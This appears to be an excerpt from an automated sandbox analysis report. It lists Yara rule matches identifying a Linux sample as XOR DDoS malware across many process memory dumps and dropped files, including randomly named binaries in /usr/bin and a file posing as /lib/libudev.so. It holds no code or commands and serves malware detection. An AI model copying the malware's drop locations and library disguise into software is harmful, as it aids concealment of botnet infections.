Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9799, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9810, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9821, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9843, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9854, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9865, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9887, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9898, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9909, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9931, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9942, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9953, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9975, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9999, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10010, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10021, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10043, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10054, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10065, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10087, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10098, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10109, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10131, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10142, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10153, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10175, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10186, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10197, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10219, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/zetazkptwu, type: DROPPED
Source: Yara match	File source: /usr/bin/tudlcvpgbc, type: DROPPED
Source: Yara match	File source: /usr/bin/qjfxtxsijs, type: DROPPED
Source: Yara match	File source: /lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/txflbjqefg, type: DROPPED
Source: Yara match	File source: /usr/bin/zyapsjpaje, type: DROPPED
Source: Yara match	File source: /usr/bin/wrfeamwlub, type: DROPPED
Source: Yara match	File source: /usr/bin/kmavqzvhro, type: DROPPED
Source: Yara match	File source: /usr/bin/whtzopaggc, type: DROPPED
Source: Yara match	File source: /usr/bin/wyyhrifhaz, type: DROPPED
Source: Yara match	File source: /usr/bin/wgpgdetjwe, type: DROPPED
Source: Yara match	File source: /usr/bin/yfiimchuiz, type: DROPPED
Source: Yara match	File source: /usr/bin/qvilroogsz, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: dkuidbsedp, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: dkuidbsedp, type: SAMPLE	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/zetazkptwu, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/tudlcvpgbc, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/tudlcvpgbc, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/qjfxtxsijs, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/qjfxtxsijs, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /lib/libudev.so, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /lib/libudev.so, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/kmavqzvhro, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/kmavqzvhro, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/zyapsjpaje, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/zyapsjpaje, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/txflbjqefg, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/txflbjqefg, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/whtzopaggc, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/whtzopaggc, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/wrfeamwlub, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wrfeamwlub, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/wyyhrifhaz, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wyyhrifhaz, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/wgpgdetjwe, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wgpgdetjwe, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/yfiimchuiz, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/yfiimchuiz, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/qvilroogsz, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/qvilroogsz, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT

Source: dkuidbsedp, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: dkuidbsedp, type: SAMPLE	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
